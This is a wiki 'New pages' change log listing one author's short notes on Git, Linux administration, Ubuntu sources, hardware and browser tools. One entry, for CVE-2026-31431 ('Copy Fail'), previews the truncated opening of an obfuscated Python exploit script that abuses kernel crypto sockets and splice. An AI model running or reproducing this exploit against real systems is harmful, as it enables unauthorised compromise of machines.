New pages
Jump to navigation
Jump to search
- 05:35, 17 June 2026 Git/Branch (hist | edit) [1,471 bytes] Kenneth (talk | contribs) (Created page with "== Create new branch from last 10 commits == https://stackoverflow.com/questions/50992188/how-to-push-a-shallow-clone-to-a-new-repo <pre> # First, shallow-clone the old repo to the depth we want to keep git clone --depth=50 https://...@bitbucket.org/....git # Go into the directory of the clone cd clonedrepo # Once in the clone's repo directory, remove the old origin git remote remove origin # Store the hash of the oldest commit (ie. in this case, the 50th) in a var...")
- 05:32, 17 June 2026 Git/Signing Unsigned (hist | edit) [1,856 bytes] Kenneth (talk | contribs) (Created page with "== Sign Current Commit == git commit --amend --no-edit -S == Rebase everything == Rebase everything until 'development' (or any hash) <ref>https://superuser.com/questions/397149/can-you-gpg-sign-old-commits</ref> git rebase --exec 'git commit --amend --no-edit -n -S' -i development Resign everything from root: git rebase --exec 'git commit --amend --no-edit -n -S' -i --root == Create new branch from last 10 commits == https://stackoverflow.com/questions/5099218...")
- 15:29, 4 June 2026 Mitmproxy (hist | edit) [415 bytes] Kenneth (talk | contribs) (Created page with "https://www.mitmproxy.org/ mitmproxy is a free and open source interactive HTTPS proxy.")
- 15:28, 4 June 2026 Mitm (hist | edit) [338 bytes] Kenneth (talk | contribs) (Created page with "A Man-in-the-Middle (MitM) attack is a cyberattack where a hacker secretly intercepts and relays communications between two parties. The victims believe they are talking directly to each other, but the attacker is secretly eavesdropping on or altering the data, often to steal login credentials or financial information See mitmproxy")
- 03:31, 30 May 2026 Linux/Open Files (hist | edit) [952 bytes] Kenneth (talk | contribs) (Created page with "List processes with most open files: lsof | awk '{print $1}' | sort | uniq -c | sort -rn | head -10 The "Too many open files" error occurs when a process or user reaches the upper limit of allocated file descriptors (FDs), which in Linux includes network sockets, pipes, and regular files. To resolve this, you need to identify the culprit process and then adjust either the user-level session limits or the system-wide limits. Check session limits: Run ulimit -Sn to chec...")
- 22:09, 18 May 2026 Google/IssueTracker (hist | edit) [60 bytes] Kenneth (talk | contribs) (Created page with " https://issuetracker.google.com/")
- 16:59, 18 May 2026 Movies (hist | edit) [1,279 bytes] Kenneth (talk | contribs) (Created page with "== Taglines == Movie taglines are short, punchy marketing slogans used on posters and in trailers to capture a film's tone, genre, or core premise. Unlike plot summaries, they act as "vibe summaries" meant to quickly hook the viewer's attention and promise a specific cinematic experience.")
- 17:56, 15 May 2026 PCH (hist | edit) [1,120 bytes] Kenneth (talk | contribs) (Created page with "== Platform Controller Hub (PCH) == Chipset PCH - A Platform Controller Hub (PCH) is a microchip on a motherboard that manages data flow and communication between the CPU and attached peripherals. It essentially acts as the traffic controller for your computer's input/output (I/O) functions. ref: <ref>https://en.wikipedia.org/wiki/Platform_Controller_Hub</ref> === What the PCH Does === * I/O Management: Handles communication for your USB ports, audio, SATA (hard driv...")
- 17:46, 15 May 2026 Supermicro/X13SAE-F (hist | edit) [324 bytes] Kenneth (talk | contribs) (Created page with " X13SAE-F | Motherboards | Products | Supermicro https://www.supermicro.com/en/products/motherboard/x13sae-f") originally created as "X13SAE-F"
- 17:06, 5 May 2026 CVE/copy-fail-CVE-2026-31431 (hist | edit) [26 bytes] Kenneth (talk | contribs) (Created page with "See CVE/CVE-2026-31431")
- 17:05, 5 May 2026 CVE/CVE-2026-31431 (hist | edit) [901 bytes] Kenneth (talk | contribs) (Created page with "== Copy Fail == === copy_fail_exp.py === <pre> #!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u....")
- 20:10, 4 May 2026 Ubuntu/IPv6 (hist | edit) [293 bytes] Kenneth (talk | contribs) (Created page with "== Disable IPv6 == <pre> cat >> /etc/sysctl.conf << "EOF" net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 EOF sudo sysctl -p </pre> Premenent: <pre> /etc/default/grub GRUB_CMDLINE_LINUX="ipv6.disable=1" sudo update-grub </pre>")
- 20:54, 1 May 2026 8020 (hist | edit) [1,734 bytes] Kenneth (talk | contribs) (Created page with "== 80/20 Aluminum == 80/20 aluminum is a modular, lightweight T-slot aluminum extrusion framing system, often called "The Industrial Erector Set®," used to build custom frames, machine guards, workstations, and robotics without welding. It is known for its versatility, durability, and easy assembly using T-slot connectors. Synonyms include T-slot aluminum extrusion, aluminum framing, t-slot aluminum structural framing, or aluminum profiles. Key Features and Usage Exam...")
- 20:06, 1 May 2026 PPA (hist | edit) [96 bytes] Kenneth (talk | contribs) (Created page with "== Ubuntu's Personal Package Archive - PPA == Similar to RHEL's EPEL")
- 16:14, 21 April 2026 Linux/patch (hist | edit) [1,679 bytes] Kenneth (talk | contribs) (Created page with "See: * Linux/diff * patch * diff")
- 22:04, 20 April 2026 Ubuntu/Sources/22 (hist | edit) [3,294 bytes] Kenneth (talk | contribs) (Created page with "== 22 - Jammy == <pre> $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.5 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.5 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" </pre> <pre> $ cat /etc/apt/sources.list # deb cdrom:[Ubuntu 22....")
- 22:02, 20 April 2026 Ubuntu/Sources/Jammy (hist | edit) [25 bytes] Kenneth (talk | contribs) (Created page with "See Ubuntu/Sources/22")
- 22:02, 20 April 2026 Ubuntu/Sources (hist | edit) [258 bytes] Kenneth (talk | contribs) (Created page with "== Sources == == 24 - Xenial == See Ubuntu/Sources/24 See Ubuntu/Sources/Xenial == 22 - Jammy == See Ubuntu/Sources/22 See Ubuntu/Sources/Jammy == 20 - Xenial == See Ubuntu/Sources/20 See Ubuntu/Sources/Xenial == keywords ==")
- 20:55, 14 April 2026 GitHub/GitHub Actions Workflow (hist | edit) [23 bytes] Kenneth (talk | contribs) (Created page with "See GitHub/Workflow")
- 06:58, 10 April 2026 VBinDiff (hist | edit) [450 bytes] Kenneth (talk | contribs) (Created page with "GitHub: https://github.com/madsen/vbindiff Build Source Code: # Ubuntu Dependencies: sudo apt install libtemplate-perl # Clone git clone https://github.com/madsen/vbindiff.git cd vbindiff git submodule update --init autoreconf -i ./configure make clean make ./vbindiff [binfile1] [binfile2] Press [enter] to jump to next difference between two bin files. Will be highlighted in red (beta 6 version) (or light cyan in beta 5 version)")
- 06:18, 8 April 2026 Games/StarRupture (hist | edit) [390 bytes] Kenneth (talk | contribs) (Created page with "== Save Game Location == C:\Program Files (x86)\Steam\userdata\[YourSteamID]\1631270\remote\Saved\SaveGames")
- 22:56, 31 March 2026 Mermaid Charts (hist | edit) [1,116 bytes] Kenneth (talk | contribs) (Created page with "== Mermaid Charts == The "official" Mermaid Editor plugin by the team behind the Mermaid open source project. https://www.mermaidchart.com/ https://mermaid.ai/ Mermaid Chart was born out of the Mermaid open source project and was founded by Knut Sveidqvist together with Open Core Ventures. The lead developers from Mermaid have joined the company and there is a strong connection between the project we all love and Mermaid Chart. Mermaid Chart brings resources to the...")
- 23:01, 27 March 2026 IDF (hist | edit) [11 bytes] Kenneth (talk | contribs) (Created page with "IDF and MDF")
- 17:19, 25 March 2026 Ghostery (hist | edit) [310 bytes] Kenneth (talk | contribs) (Created page with "== Ghostery == https://www.ghostery.com/ Chrome: https://chromewebstore.google.com/detail/ghostery-tracker-ad-block/mlomiejdfkolichcflejclcbmpeaniij Firefox: https://addons.mozilla.org/en-US/firefox/addon/ghostery/ == Ad Blocker == See also Ad Blocker == keywords == keyword: mispelling Ghosterly")
- 17:17, 25 March 2026 Firefox/Extensions (hist | edit) [2,604 bytes] Kenneth (talk | contribs) (Created page with "== Extensions ==")
- 17:01, 23 March 2026 VM (hist | edit) [57 bytes] Kenneth (talk | contribs) (Created page with "VM == VM Detection ==")
- 22:41, 22 March 2026 Git/Shallow (hist | edit) [9,406 bytes] Kenneth (talk | contribs) (Created page with "== Shallow Clone == git clone --filter=blob:none <url> creates a blobless clone. ... git clone --filter=tree:0 <url> creates a treeless clone. ... git clone --depth=1 <url> creates a shallow clone. == Convert Cloned Repo to Shallow == <pre> git clone --depth-1 <repo> -b <branch> git clone --depth 1 org-1234@github.com:MYORG/MYREPO.git -b MYREPO/MYBRANCH MYBRANCH git clean -x -f -d . git pull --depth 1 git fetch --depth 1 git reflog expire --expire=0 git reflog...")
- 21:15, 22 March 2026 Linux/tree (hist | edit) [231 bytes] Kenneth (talk | contribs) (Created page with "== Always Show Color == With less: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")
- 21:15, 22 March 2026 Linux/less (hist | edit) [357 bytes] Kenneth (talk | contribs) (Created page with "== Always Show Color == less -R With ls: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> ls --color=always -l | less -R With tree: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")